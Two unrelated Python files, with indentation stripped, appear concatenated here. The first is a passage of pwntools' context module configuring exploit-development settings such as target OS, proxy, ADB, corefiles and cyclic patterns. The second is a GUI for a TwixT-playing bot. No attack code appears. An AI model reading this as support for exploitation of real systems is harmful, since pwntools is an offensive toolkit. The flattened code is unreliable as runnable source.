>>> log.info('Hello from foo!')
>>> file('foo.txt').readlines()[-3] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello!\n'
>>> file('foo.txt').readlines()[-2] #doctest: +ELLIPSIS
'...:INFO:...:Hello again!\n'
>>> file('foo.txt').readlines()[-1] #doctest: +ELLIPSIS
'...:INFO:...:Hello from foo!\n'
>>> file('bar.txt').readlines()[-1] #doctest: +ELLIPSIS
'...:DEBUG:...:Hello from bar!\n'
"""
if isinstance(value, (str,unicode)):
modes = ('w', 'wb', 'a', 'ab')
# check if mode was specified as "[value],[mode]"
if ',' not in value:
value += ',a'
filename, mode = value.rsplit(',', 1)
value = open(filename, mode)
elif not isinstance(value, (file)):
raise AttributeError('log_file must be a file')
# Is this the same file we already have open?
# If so, don't re-print the banner.
if self.log_file and not isinstance(self.log_file, _devnull):
a = os.fstat(value.fileno()).st_ino
b = os.fstat(self.log_file.fileno()).st_ino
if a == b:
return self.log_file
iso_8601 = '%Y-%m-%dT%H:%M:%S'
lines = [
'=' * 78,
' Started at %s ' % time.strftime(iso_8601),
' sys.argv = [',
]
for arg in sys.argv:
lines.append(' %r,' % arg)
lines.append(' ]')
lines.append('=' * 78)
for line in lines:
value.write('=%-78s=\n' % line)
value.flush()
return value
@_validator
def log_console(self, stream):
"""
Sets the default logging console target.
Examples:
>>> context.log_level = 'warn'
>>> log.warn("Hello")
[!] Hello
>>> context.log_console=open('/dev/null', 'w')
>>> log.warn("Hello")
>>> context.clear()
"""
if isinstance(stream, str):
stream = open(stream, 'wt')
return stream
@property
def mask(self):
return (1 << self.bits) - 1
@_validator
def os(self, os):
"""
Operating system of the target machine.
The default value is ``linux``.
Allowed values are listed in :attr:`pwnlib.context.ContextType.oses`.
Examples:
>>> context.os = 'linux'
>>> context.os = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: os must be one of ['android', 'cgc', 'freebsd', 'linux', 'windows']
"""
os = os.lower()
if os not in ContextType.oses:
raise AttributeError("os must be one of %r" % ContextType.oses)
return os
@_validator
def randomize(self, r):
"""
Global flag that lots of things should be randomized.
"""
return bool(r)
@_validator
def signed(self, signed):
"""
Signed-ness for packing operation when it's not explicitly set.
Can be set to any non-string truthy value, or the specific string
values ``'signed'`` or ``'unsigned'`` which are converted into
:const:`True` and :const:`False` correspondingly.
Examples:
>>> context.signed
False
>>> context.signed = 1
>>> context.signed
True
>>> context.signed = 'signed'
>>> context.signed
True
>>> context.signed = 'unsigned'
>>> context.signed
False
>>> context.signed = 'foobar' #doctest: +ELLIPSIS
Traceback (most recent call last):
...
AttributeError: signed must be one of ['no', 'signed', 'unsigned', 'yes'] or a non-string truthy value
"""
try: signed = ContextType.signednesses[signed]
except KeyError: pass
if isinstance(signed, str):
raise AttributeError('signed must be one of %r or a non-string truthy value' % sorted(ContextType.signednesses))
return bool(signed)
@_validator
def timeout(self, value=Timeout.default):
"""
Default amount of time to wait for a blocking operation before it times out,
specified in seconds.
The default value is to have an infinite timeout.
See :class:`pwnlib.timeout.Timeout` for additional information on
valid values.
"""
return Timeout(value).timeout
@_validator
def terminal(self, value):
"""
Default terminal used by :meth:`pwnlib.util.misc.run_in_new_terminal`.
Can be a string or an iterable of strings. In the latter case the first
entry is the terminal and the rest are default arguments.
"""
if isinstance(value, (str, unicode)):
return [value]
return value
@property
def abi(self):
return self._abi
@_validator
def proxy(self, proxy):
"""
Default proxy for all socket connections.
Accepts either a string (hostname or IP address) for a SOCKS5 proxy on
the default port, **or** a ``tuple`` passed to ``socks.set_default_proxy``,
e.g. ``(socks.SOCKS4, 'localhost', 1234)``.
>>> context.proxy = 'localhost' #doctest: +ELLIPSIS
>>> r=remote('google.com', 80)
Traceback (most recent call last):
...
ProxyConnectionError: Error connecting to SOCKS5 proxy localhost:1080: [Errno 111] Connection refused
>>> context.proxy = None
>>> r=remote('google.com', 80, level='error')
"""
if not proxy:
socket.socket = _original_socket
return None
if isinstance(proxy, str):
proxy = (socks.SOCKS5, proxy)
if not isinstance(proxy, collections.Iterable):
raise AttributeError('proxy must be a string hostname, or tuple of arguments for socks.set_default_proxy')
socks.set_default_proxy(*proxy)
socket.socket = socks.socksocket
return proxy
@_validator
def noptrace(self, value):
"""Disable all actions which rely on ptrace.
This is useful for switching between local exploitation with a debugger,
and remote exploitation (without a debugger).
This option can be set with the ``NOPTRACE`` command-line argument.
"""
return bool(value)
@_validator
def adb_host(self, value):
"""Sets the target host which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_HOST, or set
to the default 'localhost'.
"""
return str(value)
@_validator
def adb_port(self, value):
"""Sets the target port which is used for ADB.
This is useful for Android exploitation.
The default value is inherited from ANDROID_ADB_SERVER_PORT, or set
to the default 5037.
"""
return int(value)
@_validator
def device(self, device):
"""Sets the device being operated on.
"""
if isinstance(device, Device):
self.arch = device.arch or self.arch
self.bits = device.bits or self.bits
self.endian = device.endian or self.endian
self.os = device.os or self.os
elif isinstance(device, str):
device = Device(device)
elif device is not None:
raise AttributeError("device must be either a Device object or a serial number as a string")
return device
@property
def adb(self):
"""Returns an argument array for connecting to adb.
Unless ``$ADB_PATH`` is set, uses the default ``adb`` binary in ``$PATH``.
"""
ADB_PATH = os.environ.get('ADB_PATH', 'adb')
command = [ADB_PATH]
if self.adb_host != self.defaults['adb_host']:
command += ['-H', self.adb_host]
if self.adb_port != self.defaults['adb_port']:
command += ['-P', str(self.adb_port)]
if self.device:
command += ['-s', str(self.device)]
return command
@_validator
def buffer_size(self, size):
"""Internal buffer size to use for :class:`pwnlib.tubes.tube.tube` objects.
This is not the maximum size of the buffer, but this is the amount of data
which is passed to each raw ``read`` syscall (or equivalent).
"""
return int(size)
@property
def cache_dir(self):
"""Directory used for caching data.
Note:
May be either a path string, or :const:`None`.
Example:
>>> cache_dir = context.cache_dir
>>> cache_dir is not None
True
>>> os.chmod(cache_dir, 0o000)
>>> context.cache_dir is None
True
>>> os.chmod(cache_dir, 0o755)
>>> cache_dir == context.cache_dir
True
"""
home = os.path.expanduser('~')
if not os.access(home, os.W_OK):
return None
cache = os.path.join(home, '.pwntools-cache')
if not os.path.exists(cache):
try:
os.mkdir(cache)
except OSError:
return None
# Some wargames e.g. pwnable.kr have created dummy directories
# which cannot be modified by the user account (owned by root).
if not os.access(cache, os.W_OK):
return None
return cache
@_validator
def delete_corefiles(self, v):
"""Whether pwntools automatically deletes corefiles after exiting.
This only affects corefiles accessed via :attr:`.process.corefile`.
Default value is ``False``.
"""
return bool(v)
@_validator
def rename_corefiles(self, v):
"""Whether pwntools automatically renames corefiles.
This is useful for two things:
- Prevent corefiles from being overwritten, if ``kernel.core_pattern``
is something simple like ``"core"``.
- Ensure corefiles are generated, if ``kernel.core_pattern`` uses ``apport``,
which refuses to overwrite any existing files.
This only affects corefiles accessed via :attr:`.process.corefile`.
Default value is ``True``.
"""
return bool(v)
@_validator
def gdbinit(self, value):
"""Path to the gdbinit that is used when running GDB locally.
This is useful if you want pwntools-launched GDB to include some additional modules,
like PEDA but you do not want to have GDB include them by default.
The setting will only apply when GDB is launched locally since remote hosts may not have
the necessary requirements for the gdbinit.
If set to an empty string, GDB will use the default `~/.gdbinit`.
Default value is ``""``.
"""
return str(value)
@_validator
def cyclic_alphabet(self, alphabet):
"""Cyclic alphabet.
Default value is `string.ascii_lowercase`.
"""
# Do not allow multiple occurrences
if len(set(alphabet)) != len(alphabet):
raise AttributeError("cyclic alphabet cannot contain duplicates")
return str(alphabet)
@_validator
def cyclic_size(self, size):
"""Cyclic pattern size.
Default value is `4`.
"""
size = int(size)
if size > self.bytes:
raise AttributeError("cyclic pattern size cannot be larger than word size")
return size
#*************************************************************************
# ALIASES
#*************************************************************************
#
# These fields are aliases for fields defined above, either for
# convenience or compatibility.
#
#*************************************************************************
def __call__(self, **kwargs):
"""
Alias for :meth:`pwnlib.context.ContextType.update`
"""
return self.update(**kwargs)
def reset_local(self):
"""
Deprecated. Use :meth:`clear`.
"""
self.clear()
@property
def endianness(self):
"""
Legacy alias for :attr:`endian`.
Examples:
>>> context.endian == context.endianness
True
"""
return self.endian
@endianness.setter
def endianness(self, value):
self.endian = value
@property
def sign(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@sign.setter
def sign(self, value):
self.signed = value
@property
def signedness(self):
"""
Alias for :attr:`signed`
"""
return self.signed
@signedness.setter
def signedness(self, value):
self.signed = value
@property
def word_size(self):
"""
Alias for :attr:`bits`
"""
return self.bits
@word_size.setter
def word_size(self, value):
self.bits = value
Thread = Thread
#: Global :class:`.ContextType` object, used to store commonly-used pwntools settings.
#:
#: In most cases, the context is used to infer default variables values.
#: For example, :func:`.asm` can take an ``arch`` parameter as a
#: keyword argument.
#:
#: If it is not supplied, the ``arch`` specified by ``context`` is used instead.
#:
#: Consider it a shorthand to passing ``os=`` and ``arch=`` to every single
#: function call.
context = ContextType()
# Inherit default ADB values
if 'ANDROID_ADB_SERVER_HOST' in os.environ:
context.adb_host = os.environ.get('ANDROID_ADB_SERVER_HOST')
if 'ANDROID_ADB_SERVER_PORT' in os.environ:
context.adb_port = int(os.getenv('ANDROID_ADB_SERVER_PORT'))
def LocalContext(function):
"""
Wraps the specified function on a context.local() block, using kwargs.
Example:
>>> context.clear()
>>> @LocalContext
... def printArch():
... print(context.arch)
>>> printArch()
i386
>>> printArch(arch='arm')
arm
"""
@functools.wraps(function)
def setter(*a, **kw):
# Fast path to skip adding a Context frame
if not kw:
return function(*a)
with context.local(**{k:kw.pop(k) for k,v in kw.items() if isinstance(getattr(ContextType, k, None), property)}):
return function(*a, **kw)
return setter
# Read configuration options from the context section
def update_context_defaults(section):
# Circular imports FTW!
from pwnlib.util import safeeval
from pwnlib.log import getLogger
log = getLogger(__name__)
for key, value in section.items():
if key not in ContextType.defaults:
log.warn("Unknown configuration option %r in section %r" % (key, 'context'))
continue
default = ContextType.defaults[key]
if isinstance(default, (str, unicode, tuple, int, long, list, dict)):
value = safeeval.expr(value)
else:
log.warn("Unsupported configuration option %r in section %r" % (key, 'context'))
ContextType.defaults[key] = type(default)(value)
register_config('context', update_context_defaults)
|
tbui.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import backend.twixt as twixt
import util.pmeter as pmeter
import constants as ct
import settings as st
import layout as lt
import files as fi
import plot as pt
import heatmap as hm
import uiboard
from tkinter import ttk
import PySimpleGUI as sg
import threading
import time
import logging
class BotEvent(threading.Event):
# used to stop or cancel a bot (thread)
def __init__(self):
super().__init__()
self.context = None
def get_context(self):
return self.context
def set(self, context):
super().set()
self.context = context
class ProgressWindow(sg.Window):
def __init__(self):
layout = lt.SplashScreenLayout().get_layout()
super().__init__('twixtbot-ui', layout,
background_color=sg.theme_background_color(),
keep_on_top=True, finalize=True, margins=(15, 15))
def update(self, text, progress):
self.__getitem__(ct.K_SPLASH_PROGRESS_BAR[0]).UpdateBar(progress, 100)
self.__getitem__(ct.K_SPLASH_STATUS_TEXT[0]).Update(text)
self.refresh()
class TwixtbotUI():
def __init__(self, game, stgs, board):
# Show splash screen during init
init_window = ProgressWindow()
init_window.update('initializing GUI ...', 5)
# init class properties
self.board = board
self.game = game
self.moves_score = {}
self.stgs = stgs
self.bot_event = None
self.redo_moves = []
self.next_move = None
self.logger = logging.getLogger(ct.LOGGER)
self.ui_to_be_updated = threading.Event()
# Setup main GUI window
layout = lt.MainWindowLayout(board, stgs).get_layout()
self.window = sg.Window(ct.WINDOW_TITLE,
layout,
margins=(25, 25),
finalize=True)
canvas = self.window[ct.K_EVAL_MOVES[1]].TKCanvas
self.eval_moves_plot = pt.ThreeBarPlot(canvas, ct.EVAL_PLOT_COLOR)
canvas = self.window[ct.K_VISITS[1]].TKCanvas
self.visit_plot = pt.ThreeBarPlot(canvas, ct.VISITS_PLOT_COLOR)
self.visit_plot.update()
canvas = self.window[ct.K_EVAL_HIST[1]].TKCanvas
self.eval_hist_plot = pt.EvalHistPlot(canvas, stgs)
def motion(event):
if stgs.get(ct.K_SHOW_CURSOR_LABEL[1]):
coords = (event.x, stgs.get(
ct.K_BOARD_SIZE[1]) - event.y)
_, move = board.get_move(coords)
board.draw_cursor_label(move)
self.window["BOARD"].TKCanvas.bind('<Motion>', motion)
self.window.bind('<Alt-b>', ct.B_BOT_MOVE)
self.window.bind('<Alt-a>', ct.B_ACCEPT)
self.window.bind('<Alt-c>', ct.B_CANCEL)
self.window.bind('<Alt-u>', ct.B_UNDO)
self.window.bind('<Alt-d>', ct.B_REDO)
self.window.bind('<Alt-g>', ct.B_RESIGN)
self.window.bind('<Alt-r>', ct.B_RESET)
self.window.bind('<Alt-e>', ct.EVENT_SHORTCUT_SHOW_EVALUATION)
self.window.bind('<Alt-m>', ct.EVENT_SHORTCUT_HEATMAP)
self.window.bind('<Alt-v>', ct.EVENT_SHORTCUT_VISUALIZE_MCTS)
self.window.bind('<Alt-KeyPress-1>', ct.EVENT_SHORTCUT_AUTOMOVE_1)
self.window.bind('<Alt-KeyPress-2>', ct.EVENT_SHORTCUT_AUTOMOVE_2)
self.window.bind('<Alt-Right->', ct.EVENT_SHORTCUT_TRIALS_1_PLUS)
self.window.bind('<Alt-Left->', ct.EVENT_SHORTCUT_TRIALS_1_MINUS)
self.window.bind('<Alt-Shift-Right->', ct.EVENT_SHORTCUT_TRIALS_2_PLUS)
self.window.bind('<Alt-Shift-Left->',
ct.EVENT_SHORTCUT_TRIALS_2_MINUS)
# Apply settings
init_window.update('refreshing settings ...', 10)
self.update_settings_changed()
# import
init_window.update('importing modules ...', 30)
import backend.nnmplayer as nnmplayer # noqa: F401
# Initialize and warm-up bots
self.bots = [None, None]
if self.stgs.same_models():
init_window.update('initializing bots ...', 60)
self.init_bot(1) # init bot[1]
self.init_bot(2, self.bots[1].evaluator)
else:
init_window.update('initializing bot 1 ...', 50)
self.init_bot(1)
init_window.update('initializing bot 2 ...', 70)
self.init_bot(2)
init_window.update('warming up bots ...', 90)
self.bots[0].nm.eval_game(self.game)
self.bots[1].nm.eval_game(self.game)
# Update evaluation graph
self.update_evals()
# Close and destroy splash window
init_window.update('ready to play', 100)
time.sleep(1)
init_window.close()
def __del__(self):
if hasattr(self, 'window'):
self.window.close()
del self.stgs
del self.game
del self.board
def get_control(self, key, player=None):
if player:
return self.window[key[player]]
return self.window[key[1]]
def get_current(self, key):
return self.stgs.get_current(key, self.game)
def set_current(self, key, value):
return self.stgs.set_current(key, value, self.game)
# update_ functions to update ui controls
def update_tooltips(self):
self.get_control(ct.K_AUTO_MOVE, 1).set_tooltip(
self.stgs.get_tooltip(1))
self.get_control(ct.K_AUTO_MOVE, 2).set_tooltip(
self.stgs.get_tooltip(2))
def update_turn_indicators(self):
turn = ["", ""]
if self.game.result == twixt.RESIGN:
turn[self.game.turn] = ""
turn[1 - self.game.turn] = ct.TURN_RESIGNED
elif self.game.just_won():
turn[self.game.turn] = ct.TURN_HAS_WON
turn[1 - self.game.turn] = ""
elif self.game.turn == 1:
turn = [ct.TURN_CHAR, '']
else:
turn = ['', ct.TURN_CHAR]
self.get_control(ct.K_TURN_INDICATOR, 1).Update(turn[0])
self.get_control(ct.K_TURN_INDICATOR, 2).Update(turn[1])
def update_history(self):
text = ""
for i, move in enumerate(self.game.history):
text += "\n" if i > 0 and i % 2 == 0 else ""
text += str(i + 1).rjust(2, ' ') + '. ' + str(move).upper()
if move == twixt.SWAP:
m1 = self.game.history[0]
text += " " + chr(m1.y + ord('A')) + str(m1.x + 1)
text += "\t\t" if i % 2 == 0 else ""
self.get_control(ct.K_MOVES).Update(text)
def calc_eval(self):
score, moves, P = self.bots[self.game.turn].nm.eval_game(self.game)
# get score from white's perspective
sc = round((2 * self.game.turn - 1) * score, 3)
self.next_move = sc, moves, P
# Add sc to dict of historical scores
self.moves_score[len(self.game.history)] = sc
return sc, moves, P
def clear_evals(self):
self.get_control(ct.K_EVAL_NUM).Update('')
self.get_control(ct.K_EVAL_BAR).Update(0)
self.eval_moves_plot.update()
self.eval_hist_plot.update()
self.visit_plot.update()
self.next_move = None
def update_evals(self):
if not self.get_control(ct.K_SHOW_EVALUATION).get():
self.clear_evals()
return
if not self.game_over(False):
sc, moves, P = self.calc_eval()
self.get_control(ct.K_EVAL_NUM).Update(sc)
self.get_control(ct.K_EVAL_BAR).Update(1000 * sc + 1000)
# update chart
values = {"moves": moves, "Y": P}
self.eval_moves_plot.update(values, 1000)
# clean visits
self.visit_plot.update()
self.eval_hist_plot.update(self.moves_score)
def update_evalbar_colors(self):
s = ttk.Style()
ebs = self.window[ct.K_EVAL_BAR[1]].TKProgressBar.style_name
s.configure(ebs, background=self.stgs.get(ct.K_COLOR[1]))
s.configure(ebs, troughcolor=self.stgs.get(ct.K_COLOR[2]))
def update_progress(self, values=None):
if values is None:
text = ""
value = 0
max_value = 0
else:
max_value = values["max"]
value = values["current"]
if self.stgs.get(ct.K_SMART_ACCEPT[1]) and "Y" in values:
diff = values["Y"][0] - values["Y"][1]
if diff > max_value - value:
# 2nd best cannot catch up => accept (if not already
# cancelled)
if self.bot_event.get_context() != ct.CANCEL_EVENT:
self.handle_accept_bot()
# reduce max val
while (diff > values["max"] - max_value + ct.MCTS_TRIAL_CHUNK
and max_value >= value + ct.MCTS_TRIAL_CHUNK):
max_value -= ct.MCTS_TRIAL_CHUNK
text = str(value) + "/" + str(max_value) + " " + \
str(round(100 * value / max_value)) + "% "
v = 100.0 * (value + values["max"] - max_value) / values["max"]
self.timer.update(v)
text += self.timer.getstatus()
self.get_control(ct.K_PROGRESS_NUM).Update(text)
self.get_control(ct.K_PROGRESS_BAR).UpdateBar(value, max_value)
def update_after_move(self, complete=True):
if self.get_control(ct.K_HEATMAP).get():
heatmap = hm.Heatmap(self.game, self.bots[self.game.turn])
else:
heatmap = None
self.board.draw(heatmap, complete)
self.window.refresh()
# reset progress
self.update_progress()
self.update_turn_indicators()
self.update_history()
if self.get_control(ct.K_SHOW_EVALUATION).get():
self.update_evals()
def update_settings_changed(self):
self.board.draw()
self.window.refresh()
# update ui
for p in [1, 2]:
self.get_control(ct.K_NAME, p).Update(
self.stgs.get(ct.K_NAME[p]))
self.get_control(ct.K_COLOR, p).erase()
self.get_control(ct.K_COLOR, p).DrawCircle(
(7, 9), 6, self.stgs.get(ct.K_COLOR[p]),
self.stgs.get(ct.K_COLOR[p]))
self.get_control(ct.K_AUTO_MOVE, p).Update(
self.stgs.get(ct.K_AUTO_MOVE[p]))
self.get_control(ct.K_TRIALS, p).Update(
self.stgs.get(ct.K_TRIALS[p]))
self.update_turn_indicators()
self.update_tooltips()
self.update_evalbar_colors()
self.eval_hist_plot.update(self.moves_score)
self.update_bots()
self.update_game()
self.update_logger()
def reset_game(self):
self.game.__init__(self.stgs.get(ct.K_ALLOW_SCL[1]))
self.moves_score = {}
# get eval of empty board to avoid gap at x=0 in plot in loaded games
self.calc_eval()
def update_game(self):
self.game.allow_scl = self.stgs.get(ct.K_ALLOW_SCL[1])
def update_logger(self):
self.logger.setLevel(self.stgs.get(ct.K_LOG_LEVEL[1]))
# bot functions
def update_bots(self):
for t in [0, 1]:
if hasattr(self, 'bots') and self.bots[t] is not None:
p = self.game.turn_to_player(t)
# update bot
self.bots[t].allow_swap = self.stgs.get(
ct.K_ALLOW_SWAP[1])
self.bots[t].num_trials = int(
self.stgs.get(ct.K_TRIALS[p]))
self.bots[t].temperature = float(
self.stgs.get(ct.K_TEMPERATURE[p]))
self.bots[t].random_rotation = self.stgs.get(
ct.K_RANDOM_ROTATION[p])
self.bots[t].add_noise = float(
self.stgs.get(ct.K_ADD_NOISE[p]))
# update bot's mcts object
self.bots[t].nm.smart_root = self.stgs.get(ct.K_SMART_ROOT[p])
self.bots[t].nm.cpuct = float(
self.stgs.get(ct.K_CPUCT[p]))
self.bots[t].nm.visualize_mcts = self.get_control(
ct.K_VISUALIZE_MCTS).get()
def init_bot(self, player, evaluator=None):
args = {
"allow_swap": self.stgs.get(ct.K_ALLOW_SWAP[1]),
"model": self.stgs.get(ct.K_MODEL_FOLDER[player]),
"trials": self.stgs.get(ct.K_TRIALS[player]),
"smart_root": self.stgs.get(ct.K_SMART_ROOT[player]),
"temperature": self.stgs.get(ct.K_TEMPERATURE[player]),
"random_rotation": self.stgs.get(ct.K_RANDOM_ROTATION[player]),
"add_noise": self.stgs.get(ct.K_ADD_NOISE[player]),
"cpuct": self.stgs.get(ct.K_CPUCT[player]),
"board": self.board,
"evaluator": evaluator
}
import backend.nnmplayer as nnmplayer
self.bots[2 - player] = nnmplayer.Player(**args)
def call_bot(self):
# mcts, or first/second move (we are in a thread)
response = self.bots[self.game.turn].pick_move(
self.game, self.window, self.bot_event)
if (self.bot_event is None or not self.bot_event.is_set() or
self.bot_event.get_context() == ct.ACCEPT_EVENT):
# bot has not been cancelled (but is finished or accepted)
# so execute move.
# execute move must be inside thread!
self.execute_move(response["moves"][0])
else:
# reset history_at_root resets tree and visit counts
self.bots[self.game.turn].nm.history_at_root = None
return
def launch_call_bot(self):
self.visit_plot.update()
self.update_progress()
self.window[ct.K_SPINNER[1]].Update(visible=True)
self.bot_event = BotEvent()
self.ui_to_be_updated.set()
self.thread = threading.Thread(target=self.call_bot, args=())
self.timer = pmeter.ETA(100.0, max_seconds=20)
self.thread.start()
# handle events
def handle_board_click(self, values):
if self.game_over():
return
move, _ = self.board.get_move(values[ct.K_BOARD[1]])
if move is not None:
# clear move statistics
self.execute_move(move)
self.update_after_move(False)
def handle_open_file(self):
players, moves, x_lines = fi.get_game(self.stgs.get(ct.K_ALLOW_SCL[1]))
if players is None:
return
# assign player names
self.stgs.settings[ct.K_NAME[1]] = players[0]
self.stgs.settings[ct.K_NAME[2]] = players[1]
# adjust settings if needed
if x_lines:
self.stgs.set(ct.K_ALLOW_SCL[1], True)
self.update_settings_changed()
# reset game (which also handles changes crossing lines settings)
self.reset_game()
# replay game
try:
lt.popup("loading game...")
for m in moves:
self.execute_move(m)
self.calc_eval()
except Exception:
lt.popup("invalid move: " + str(m))
self.update_after_move()
def handle_save_file(self):
fi.save_game(
[self.stgs.settings[ct.K_NAME[p]] for p in (1, 2)],
self.game.history,
self.game.SIZE,
self.game is not None)
def handle_resign(self):
if self.game_over():
return
self.execute_move(twixt.RESIGN)
def handle_undo(self):
if self.game.result == twixt.RESIGN:
self.game.result = None
self.redo_moves.append(twixt.RESIGN)
return
gl = len(self.game.history)
if gl in self.moves_score:
del self.moves_score[gl]
if gl > 0:
self.redo_moves.append(self.game.history[-1])
self.game.undo()
# switch off auto move
if self.get_current(ct.K_AUTO_MOVE):
self.set_current(ct.K_AUTO_MOVE, False)
self.get_control(
ct.K_AUTO_MOVE, self.game.turn_to_player()).Update(False)
def handle_redo(self):
if len(self.redo_moves) > 0:
self.execute_move(self.redo_moves.pop(), False)
def handle_accept_bot(self):
self.bot_event.set(ct.ACCEPT_EVENT)
def handle_cancel_bot(self):
self.bot_event.set(ct.CANCEL_EVENT)
# switch off auto move
# (do not use self.game.turn_to_player() to determine current
# player during mcts)
if self.get_control(ct.K_TURN_INDICATOR, 1).get() == ct.TURN_CHAR:
p = 1
else:
p = 2
self.stgs.set(ct.K_AUTO_MOVE[p], False)
self.get_control(ct.K_AUTO_MOVE, p).Update(False)
def handle_thread_event(self, values):
self.logger.info("Bot response: %s", values)
if values["max"] != 0:
# mcts case
self.update_progress(values)
if (self.get_control(ct.K_SHOW_EVALUATION).get() and
"moves" in values and "current" in values and
len(values["moves"]) > 1):
self.visit_plot.update(values, max(1, values["max"]))
def handle_accept_and_cancel(self, event):
if event == ct.B_ACCEPT:
self.handle_accept_bot()
elif event == ct.B_CANCEL:
self.handle_cancel_bot()
elif event in [ct.K_BOARD[1],
ct.B_UNDO, ct.B_REDO, ct.B_RESIGN, ct.B_RESET,
ct.B_BOT_MOVE,
ct.K_VISUALIZE_MCTS[1],
ct.EVENT_SHORTCUT_VISUALIZE_MCTS,
ct.K_HEATMAP[1], ct.EVENT_SHORTCUT_HEATMAP,
ct.K_SHOW_EVALUATION[1],
ct.EVENT_SHORTCUT_SHOW_EVALUATION]:
lt.popup("bot in progress. Click Accept or Cancel.")
# undo checkbox change
if event == ct.K_VISUALIZE_MCTS[1]:
self.get_control(ct.K_VISUALIZE_MCTS).update(
not self.get_control(ct.K_VISUALIZE_MCTS).get())
elif event == ct.K_HEATMAP[1]:
self.get_control(ct.K_HEATMAP).update(
not self.get_control(ct.K_HEATMAP).get())
elif event == ct.K_SHOW_EVALUATION[1]:
self.get_control(ct.K_SHOW_EVALUATION).update(
not self.get_control(ct.K_SHOW_EVALUATION).get())
def thread_is_alive(self):
return (hasattr(self, 'thread') and
self.thread and self.thread.is_alive())
def game_over(self, display_message=True):
if self.game.just_won():
if display_message:
lt.popup('Game over: ' + self.stgs.get(
ct.K_NAME[3 - self.game.turn_to_player()]) + ' has won!')
return True
elif self.game.result == twixt.RESIGN:
if display_message:
lt.popup('Game over: ' +
self.get_current(ct.K_NAME) + ' has resigned!')
return True
return False
def execute_move(self, move, clear_redo_moves=True):
if clear_redo_moves:
self.redo_moves = []
if move == twixt.RESIGN:
self.game.result = twixt.RESIGN
self.game_over()
return
elif move == twixt.SWAP:
self.game.play_swap()
else:
self.game.play(move)
self.game_over()
self.next_move = None
def bot_move(self):
if self.next_move is None:
self.calc_eval()
if not self.game_over():
if ((-2 * self.game.turn + 1) * self.next_move[0] >
self.stgs.get(ct.K_RESIGN_THRESHOLD[1])):
# resign-threshold reached
self.visit_plot.update()
self.update_progress()
self.execute_move(twixt.RESIGN)
self.update_after_move(False)
elif self.get_current(ct.K_TRIALS) == 0:
# no mcts
if len(self.game.history) >= 2:
# we already have the next move
# from eval update => execute it
self.execute_move(self.next_move[1][0])
else:
# first or second move (special policy)
# => sync call + execute
response = self.bots[self.game.turn].pick_move(
self.game, self.window, self.bot_event)
self.execute_move(response["moves"][0])
# window update
self.update_after_move(False)
# send pseudo-event to keep loop going
# necessary in case of trials==0 and
# auto_move=True for both bots
self.window.write_event_value('PSEUDO', None)
else:
# mcts => async bot call in thread
self.launch_call_bot()
def create_settings_window(self):
sd = lt.SettingsDialogLayout()
layout = sd.get_layout()
settings_window = sg.Window(ct.SETTINGS_DIALOG_TITLE, layout,
keep_on_top=True, finalize=True,
margins=(15, 15))
self.stgs.update_window(settings_window)
return settings_window
def settings_dialog(self):
dialog = self.create_settings_window()
while True:
event, values = dialog.read()
if event == sg.WIN_CLOSED or event == ct.B_CANCEL:
break
elif event == ct.B_RESET_DEFAULT:
self.stgs.reset_to_default(dialog)
dialog.refresh()
elif event == ct.B_APPLY_SAVE:
self.stgs.save(values)
break
dialog.close()
return event
def create_about_window(self):
ad = lt.AboutDialogLayout()
layout = ad.get_layout()
about_window = sg.Window(ct.ABOUT_DIALOG_TITLE, layout, finalize=True,
keep_on_top=True, margins=(15, 15))
return about_window
def about_dialog(self):
dialog = self.create_about_window()
while True:
event, values = dialog.read()
if event in [sg.WIN_CLOSED, ct.B_OK, ct.EVENT_EXIT]:
break
dialog.close()
def get_event(self):
if self.thread_is_alive() or self.ui_to_be_updated.is_set():
self.get_control(ct.K_SPINNER).UpdateAnimation(ct.SPINNER_IMAGE)
# frequent read to update progress gif
return self.window.read(timeout=200)
else:
# blocking read when no bot is processing
return self.window.read()
def handle_menue_event(self, event, values):
if event == ct.ITEM_SETTINGS.replace('&', ''):
if self.settings_dialog() == ct.B_APPLY_SAVE:
self.update_settings_changed()
return True
if event == ct.ITEM_ABOUT.replace('&', ''):
self.about_dialog()
return True
if event == ct.ITEM_OPEN_FILE.replace('&', ''):
self.handle_open_file()
return True
if event == ct.ITEM_SAVE_FILE.replace('&', ''):
self.handle_save_file()
return True
return False
def handle_button_event(self, event, values):
if event == ct.B_BOT_MOVE:
self.bot_move()
return True
if event == ct.B_UNDO:
self.handle_undo()
self.update_after_move()
return True
if event == ct.B_REDO:
self.handle_redo()
self.update_after_move()
return True
if event == ct.B_RESIGN:
self.handle_resign()
self.update_turn_indicators()
return True
if event == ct.B_RESET:
self.reset_game()
self.update_after_move()
return True
return False
def handle_shortcut_event(self, event, values):
if event == ct.EVENT_SHORTCUT_HEATMAP:
# toggle heatmap checkbox and redraw board
self.get_control(ct.K_HEATMAP).Update(
not self.get_control(ct.K_HEATMAP).get())
self.update_after_move()
return True
if event == ct.EVENT_SHORTCUT_SHOW_EVALUATION:
# toggle evaluation checkbox and redraw board
self.get_control(ct.K_SHOW_EVALUATION).Update(
not self.get_control(ct.K_SHOW_EVALUATION).get())
self.update_after_move()
return True
if event == ct.EVENT_SHORTCUT_VISUALIZE_MCTS:
# toggle visualize checkbox and redraw board
self.get_control(ct.K_VISUALIZE_MCTS).Update(
not self.get_control(ct.K_VISUALIZE_MCTS).get())
self.update_after_move()
return True
if event == ct.EVENT_SHORTCUT_AUTOMOVE_1:
check = self.get_control(ct.K_AUTO_MOVE, 1).get()
self.get_control(ct.K_AUTO_MOVE, 1).Update(not check)
self.stgs.set(ct.K_AUTO_MOVE[1], not check)
return True
if event == ct.EVENT_SHORTCUT_AUTOMOVE_2:
check = self.get_control(ct.K_AUTO_MOVE, 2).get()
self.get_control(ct.K_AUTO_MOVE, 2).Update(not check)
self.stgs.set(ct.K_AUTO_MOVE[2], not check)
return True
def update_slider(player, func, limit, factor):
trials_new = func(self.get_control(
ct.K_TRIALS, player).Widget.get() +
factor * ct.TRIALS_RESOLUTION, limit)
self.stgs.set(ct.K_TRIALS[player], trials_new)
self.get_control(ct.K_TRIALS, player).Update(trials_new)
self.update_bots()
return True
if event == ct.EVENT_SHORTCUT_TRIALS_1_PLUS:
return update_slider(1, min, ct.TRIALS_MAX, 1)
if event == ct.EVENT_SHORTCUT_TRIALS_1_MINUS:
return update_slider(1, max, 0, -1)
